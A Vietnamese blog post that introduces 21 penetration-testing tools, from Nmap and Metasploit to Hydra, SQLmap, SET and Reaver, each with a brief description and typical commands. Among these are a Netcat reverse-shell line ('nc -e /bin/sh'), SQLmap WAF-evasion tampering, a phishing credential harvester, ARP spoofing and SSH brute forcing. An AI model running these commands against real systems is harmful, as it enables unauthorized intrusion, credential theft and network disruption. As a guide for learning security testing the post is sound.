1. Nmap (Network Mapper)

Kiến thức cốt lõi: Nmap không chỉ quét cổng mà còn cung cấp thông tin chi tiết về hệ điều hành, phiên bản dịch vụ, và cấu hình mạng. Điểm mạnh nằm ở khả năng tùy chỉnh quét (scan types) và né tránh phát hiện (evasion). Lệnh -A mạnh nhưng chậm, nên tùy tình huống, bạn có thể dùng các tùy chọn như -sS (TCP SYN scan) để quét nhanh hoặc -sU cho UDP.

  • Tác dụng: Khám phá mạng (network discovery) và lập bản đồ mục tiêu (target mapping).
  • Thực hành: Sử dụng --script để chạy các script NSE (Nmap Scripting Engine) như nmap --script vuln <target_ip> để quét lỗ hổng.
  • Lưu ý: Quét không được phép trên mạng không sở hữu có thể vi phạm pháp luật.

Cách sử dụng:

Lệnh này thực hiện quét nâng cao, thu thập thông tin hệ điều hành, dịch vụ, và phiên bản.

nmap -A <target_ip>

2. Metasploit Framework

Kiến thức cốt lõi: Metasploit là trung tâm của kiểm thử xâm nhập nhờ kho exploit khổng lồ và khả năng tùy chỉnh payload. Giá trị cốt lõi nằm ở quy trình: tìm kiếm exploit (search), cấu hình (set), và khai thác (exploit). Payload như meterpreter cho phép kiểm soát hệ thống từ xa với các lệnh mạnh mẽ (upload, download, keylogger).

  • Tác dụng: Khai thác lỗ hổng nhanh chóng và tự động hóa kiểm thử.
  • Thực hành: Dùng use auxiliary/scanner để quét trước khi khai thác, ví dụ: use auxiliary/scanner/smb/smb_version để kiểm tra dịch vụ SMB.
  • Lưu ý: Cập nhật thường xuyên (msfupdate) để có exploit mới nhất.

Cách sử dụng:

msfconsole

Sau khi mở giao diện, bạn có thể tìm kiếm các khai thác bằng:

search exploit <tên dịch vụ>

3. Wireshark

Kiến thức cốt lõi: Wireshark cho phép phân tích lưu lượng mạng theo thời gian thực, với sức mạnh nằm ở bộ lọc (filter) như httptcp.port == 80, hoặc ip.src == <IP>. Nó giúp phát hiện các gói tin bất thường (malicious traffic) hoặc phân tích giao thức chi tiết.

  • Tác dụng: Phát hiện tấn công mạng (MITM, packet injection) và debug giao thức.
  • Thực hành: Dùng bộ lọc hiển thị (http.request) để tập trung vào lưu lượng HTTP hoặc lưu file pcap để phân tích sau.
  • Lưu ý: Cần hiểu cơ bản về giao thức mạng (TCP/IP, HTTP) để phân tích hiệu quả.

Cách sử dụng:

wireshark

Chọn giao diện mạng để bắt đầu thu thập gói tin.

4. Aircrack-ng

Kiến thức cốt lõi: Aircrack-ng phá khóa Wi-Fi (WEP/WPA) bằng cách bắt handshake và brute force. Giá trị nằm ở bộ công cụ tích hợp: airmon-ng (chuyển card mạng sang chế độ monitor), airodump-ng (bắt gói tin), và aircrack-ng (phá khóa).

  • Tác dụng: Kiểm tra bảo mật Wi-Fi và khai thác điểm yếu giao thức.
  • Thực hành: Dùng airodump-ng --bssid <BSSID> --channel <channel> wlan0mon để tập trung vào một AP cụ thể, tiết kiệm thời gian.
  • Lưu ý: Chỉ sử dụng trên mạng bạn có quyền, vì tấn công Wi-Fi trái phép là bất hợp pháp.

Cách sử dụng:

airmon-ng start wlan0
airodump-ng wlan0mon

5. Hydra

Kiến thức cốt lõi: Hydra là công cụ brute force nhanh, hỗ trợ nhiều giao thức (SSH, FTP, HTTP). Giá trị nằm ở khả năng tùy chỉnh danh sách mật khẩu (-P) và tài khoản (-L), cùng tốc độ song song hóa cao.

  • Tác dụng: Kiểm tra độ mạnh của mật khẩu dịch vụ.
  • Thực hành: Dùng -t 4 để giới hạn số luồng, tránh khóa tài khoản do thử quá nhanh.
  • Lưu ý: Brute force dễ bị phát hiện bởi IDS/IPS, nên thử trên môi trường kiểm soát.

Cách sử dụng:

hydra -l admin -P passwords.txt <target_ip> ssh

6. John the Ripper

Kiến thức cốt lõi: John phá mật khẩu bằng cách thử từ điển (wordlist) hoặc biến đổi thông minh (rules). Giá trị nằm ở khả năng xử lý nhiều định dạng hash (MD5, SHA, NTLM) và tối ưu tốc độ trên CPU.

  • Tác dụng: Phục hồi mật khẩu từ file hash bị rò rỉ.
  • Thực hành: Dùng --format=<hash_type> để chỉ định loại hash, ví dụ: john --format=md5crypt hashfile.
  • Lưu ý: Kết hợp với wordlist chất lượng (như rockyou.txt) để tăng hiệu quả.

Cách sử dụng:

john --wordlist=password.lst hashfile

7. SQLmap

Kiến thức cốt lõi: SQLmap tự động hóa khai thác SQL Injection, từ phát hiện lỗ hổng đến trích xuất dữ liệu (database, tables, columns). Giá trị nằm ở các tùy chọn như --dbs--dump, và khả năng vượt qua WAF.

  • Tác dụng: Kiểm tra bảo mật ứng dụng web.
  • Thực hành: Dùng --tamper (như tamper=space2comment) để né các bộ lọc WAF.
  • Lưu ý: Chỉ thử trên mục tiêu được phép, vì khai thác SQL Injection có thể gây hại.

Cách sử dụng:

sqlmap -u "http://target.com/page.php?id=1" --dbs

8. Burp Suite

Kiến thức cốt lõi: Burp Suite là công cụ all-in-one cho kiểm thử web, với Proxy (chặn và sửa request), Scanner (quét lỗ hổng), và Intruder (brute force). Giá trị nằm ở khả năng tùy chỉnh request và phân tích phản hồi.

  • Tác dụng: Phát hiện lỗ hổng web (XSS, CSRF, SQLi).
  • Thực hành: Cấu hình Proxy trên trình duyệt và dùng Intruder để thử các payload (ví dụ: danh sách ID).
  • Lưu ý: Phiên bản Community miễn phí đủ dùng, nhưng Scanner chỉ có trong bản Pro.

Cách sử dụng:

burpsuite

9. Nikto

Kiến thức cốt lõi: Nikto quét máy chủ web để tìm cấu hình sai, lỗ hổng phổ biến, và file nhạy cảm. Giá trị nằm ở tốc độ và cơ sở dữ liệu lỗ hổng tích hợp.

  • Tác dụng: Kiểm tra nhanh bảo mật máy chủ web.
  • Thực hành: Dùng -Tuning để tùy chỉnh loại quét, ví dụ: nikto -h target.com -Tuning x để bỏ qua kiểm tra không cần thiết.
  • Lưu ý: Nikto tạo nhiều request, dễ bị phát hiện bởi WAF.

Cách sử dụng:

nikto -h http://target.com

10. Netcat

Kiến thức cốt lõi: Netcat là “con dao Thụy Sĩ” của mạng, cho phép tạo kết nối TCP/UDP, chuyển file, hoặc tạo shell ngược. Giá trị nằm ở sự đơn giản và linh hoạt.

  • Tác dụng: Kiểm tra cổng và thiết lập kết nối từ xa.
  • Thực hành: Dùng nc -e /bin/sh <ip> <port> để tạo shell (trên Linux).
  • Lưu ý: Một số hệ thống giới hạn nc, cần kiểm tra trước.

Cách sử dụng:

nc -lvp 4444

11. TheHarvester

Kiến thức cốt lõi: TheHarvester thu thập email, subdomain, và thông tin OSINT từ Google, Bing, Shodan. Giá trị nằm ở khả năng lập bản đồ mục tiêu trước khi tấn công.

  • Tác dụng: Tăng hiệu quả reconnaissance (thu thập thông tin).
  • Thực hành: Dùng -b all để quét từ nhiều nguồn, ví dụ: theharvester -d target.com -b all.
  • Lưu ý: Tôn trọng chính sách của công cụ tìm kiếm để tránh bị chặn.

Cách sử dụng:

theharvester -d target.com -b google

12. Maltego

Kiến thức cốt lõi: Maltego trực quan hóa mối quan hệ giữa các thực thể (email, domain, IP) qua đồ thị. Giá trị nằm ở các transform (chuyển đổi dữ liệu) để khám phá thông tin ẩn.

  • Tác dụng: Phân tích OSINT chuyên sâu.
  • Thực hành: Bắt đầu với domain, dùng transform như “To Emails” để tìm email liên quan.
  • Lưu ý: Phiên bản miễn phí giới hạn số transform, cần đăng ký để dùng đầy đủ.

Cách sử dụng:

maltego

13. WPScan

Kiến thức cốt lõi: WPScan chuyên quét lỗ hổng WordPress (plugin, theme, user). Giá trị nằm ở cơ sở dữ liệu lỗ hổng và khả năng liệt kê user (--enumerate u).

  • Tác dụng: Kiểm tra bảo mật website WordPress.
  • Thực hành: Dùng --api-token để tăng giới hạn quét với API miễn phí.
  • Lưu ý: Chỉ quét mục tiêu được phép để tránh vi phạm.

Cách sử dụng:

wpscan --url http://target.com --enumerate vp

14. SET (Social Engineering Toolkit)

Kiến thức cốt lõi: SET tự động hóa tấn công kỹ thuật xã hội như giả mạo website hoặc email phishing. Giá trị nằm ở các template sẵn có và tích hợp với Metasploit.

  • Tác dụng: Kiểm tra nhận thức bảo mật của người dùng.
  • Thực hành: Dùng “Website Attack Vectors” và chọn “Credential Harvester” để giả mạo login page.
  • Lưu ý: Cần môi trường thử nghiệm hợp pháp.

Cách sử dụng:

setoolkit

15. Ettercap

Kiến thức cốt lõi: Ettercap thực hiện MITM qua ARP spoofing hoặc DNS spoofing. Giá trị nằm ở khả năng chặn và sửa gói tin trong mạng nội bộ.

  • Tác dụng: Kiểm tra bảo mật mạng LAN.
  • Thực hành: Dùng -M arp:remote để spoof cả gateway và mục tiêu.
  • Lưu ý: Cần quyền root và hiểu cấu trúc mạng.

Cách sử dụng:

ettercap -G

16. Yersinia

Kiến thức cốt lõi: Yersinia tấn công các giao thức layer 2 (STP, DHCP, VLAN). Giá trị nằm ở khả năng phá vỡ cấu trúc mạng hoặc thu thập thông tin.

  • Tác dụng: Kiểm tra bảo mật giao thức mạng.
  • Thực hành: Dùng yersinia dhcp -attack 1 để gửi DHCP giả mạo.
  • Lưu ý: Dùng cẩn thận vì có thể làm gián đoạn mạng.

Cách sử dụng:

yersinia -G

17. Fierce

Kiến thức cốt lõi: Fierce quét DNS để tìm subdomain và IP liên quan. Giá trị nằm ở khả năng phát hiện các máy chủ ẩn trong mạng mục tiêu.

  • Tác dụng: Thu thập thông tin mạng trước tấn công.
  • Thực hành: Dùng --wordlist để brute force subdomain.
  • Lưu ý: Kết hợp với TheHarvester để có kết quả toàn diện.

Cách sử dụng:

fierce -dns target.com

18. Hashcat

Kiến thức cốt lõi: Hashcat là công cụ phá hash nhanh nhất nhờ tận dụng GPU. Giá trị nằm ở hỗ trợ nhiều thuật toán (-m) và các chế độ tấn công (dictionary, mask, hybrid).

  • Tác dụng: Phục hồi mật khẩu từ hash.
  • Thực hành: Dùng -a 3 để brute force với mask, ví dụ: hashcat -m 0 -a 3 hashfile ?d?d?d?d.
  • Lưu ý: Cần GPU mạnh để tối ưu tốc độ.

Cách sử dụng:

hashcat -m 0 hashfile rockyou.txt

19. Exploit Database (searchsploit)

Kiến thức cốt lõi: Searchsploit tìm kiếm exploit từ cơ sở dữ liệu Exploit-DB. Giá trị nằm ở tốc độ truy cập offline và khả năng lọc theo nền tảng/dịch vụ.

  • Tác dụng: Nghiên cứu exploit nhanh chóng.
  • Thực hành: Dùng -p để xem chi tiết exploit, ví dụ: searchsploit -p apache.
  • Lưu ý: Kiểm tra exploit trước khi dùng, vì một số có thể không ổn định.

Cách sử dụng:

searchsploit apache

20. Reaver

Kiến thức cốt lõi: Reaver khai thác WPS để lấy khóa Wi-Fi WPA/WPA2. Giá trị nằm ở khả năng phá khóa mà không cần handshake.

  • Tác dụng: Kiểm tra bảo mật WPS.
  • Thực hành: Dùng -S để giảm lỗi khi tấn công, ví dụ: reaver -i wlan0mon -b <BSSID> -S.
  • Lưu ý: WPS hiện ít được dùng, nên kiểm tra trước.

Cách sử dụng:

reaver -i wlan0mon -b <BSSID> -vv

21. Armitage

Kiến thức cốt lõi: Armitage cung cấp giao diện đồ họa cho Metasploit, giúp trực quan hóa mạng và tự động hóa khai thác. Giá trị nằm ở khả năng quản lý nhiều session cùng lúc.

  • Tác dụng: Tăng tốc kiểm thử xâm nhập.
  • Thực hành: Dùng “Attacks” để tìm exploit tự động sau khi quét mạng.
  • Lưu ý: Yêu cầu Metasploit cài sẵn.

Cách sử dụng:

armitage

Leave a Reply

This site uses cookies to offer you a better browsing experience. By browsing this website, you agree to our use of cookies.